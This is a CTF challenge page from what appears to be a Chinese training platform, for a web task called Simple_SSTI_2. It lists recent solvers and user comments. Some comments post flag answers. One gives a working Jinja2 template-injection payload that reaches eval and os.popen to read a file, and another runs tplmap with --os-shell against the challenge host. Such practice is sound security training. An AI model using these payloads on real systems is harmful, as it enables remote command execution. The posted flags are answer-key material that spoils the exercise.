Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
15933
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态

MD 攻破了该题 2天前

call1ng 攻破了该题 2天前

junmoo 攻破了该题 2天前

clannad 攻破了该题 4天前

19513396653 攻破了该题 5天前

HK1ng 攻破了该题 7天前

sun_space 攻破了该题 7天前

ct1640 攻破了该题 8天前

zypts 攻破了该题 9天前

288728 攻破了该题 11天前

看writeup刷题 攻破了该题 12天前

冯123456 攻破了该题 12天前

小城阿扬 攻破了该题 13天前

smtall 攻破了该题 16天前

3028545694 攻破了该题 16天前

15248665739 攻破了该题 18天前

Zzz0529 攻破了该题 19天前

炸鱼饼 攻破了该题 19天前

怀抱晚安 攻破了该题 19天前

评论
lcplj123 2年前
举报
flag{1a99409e83ac454a0087d8d4b8d7bded}
dialog007 2年前
举报
flag{5797b77f958c0d81a37ff4a0128bbe50}
saber2k 2年前
举报
flag{8b37299e6a976863ae79c8c173ce7cd1}
18096199839 2年前
举报
http://114.67.175.224:12412/?flag={{().__class__.__base__.__subclasses__[177].__init__.__globals__[%27__builtins__%27][%27eval%27](%27__import__(%22os%22).popen(%22cat%20flag%22).read()%27)}} 直接构造
tigernolion 2年前
举报
./tplmap.py -u http://114.67.175.224:14305/?flag=123 --os-shell
Adaneo 2年前
举报
有点像命令执行
Timeover 2年前
举报
全靠大佬
342300 2年前
举报
难
zhangcoolcheng 3年前
举报
还是不知道原理
ttxs25830 2年前
举报
后端代码中会把flag参数里的字符串用模板引擎渲染出来,这个方法就是让模板引擎以为我们的字符串其实是要执行的代码,大概是这个原理
lmzq 3年前
举报
用模板注入 直接用popen类调用os.open()执行系统命令